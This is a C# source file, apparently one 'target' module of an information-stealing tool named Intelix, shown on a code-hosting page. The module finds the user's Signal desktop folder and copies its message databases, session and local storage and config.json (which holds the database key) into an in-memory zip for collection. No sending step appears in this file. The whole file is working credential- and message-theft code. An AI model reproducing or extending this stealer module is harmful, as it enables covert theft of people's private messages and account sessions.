Files

44 lines
1.3 KiB
C#
Raw Permalink Normal View History

2026-08-27 10:55:23 -06:00
using System;
using System.IO;
using Intelix.Helper.Data;
namespace Intelix.Targets.Messangers;
public class Signal : ITarget
{
public void Collect(InMemoryZip zip, Counter counter)
{
string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Signal");
if (!Directory.Exists(text))
{
return;
}
Counter.CounterApplications counterApplications = new Counter.CounterApplications();
counterApplications.Name = "Signal";
string[] array = new string[4] { "databases", "Session Storage", "Local Storage", "sql" };
foreach (string path in array)
{
string text2 = Path.Combine(text, path);
if (Directory.Exists(text2))
{
string text3 = Path.Combine("Signal", path);
zip.AddDirectoryFiles(text2, text3);
counterApplications.Files.Add(text2 + " => " + text3);
}
}
string text4 = Path.Combine(text, "config.json");
if (File.Exists(text4))
{
string text5 = Path.Combine("Signal", "config.json");
zip.AddFile(text5, File.ReadAllBytes(text4));
counterApplications.Files.Add(text4 + " => " + text5);
counterApplications.Files.Add(text5);
}
if (counterApplications.Files.Count > 0)
{
counterApplications.Files.Add("Signal\\");
counter.Messangers.Add(counterApplications);
}
}
}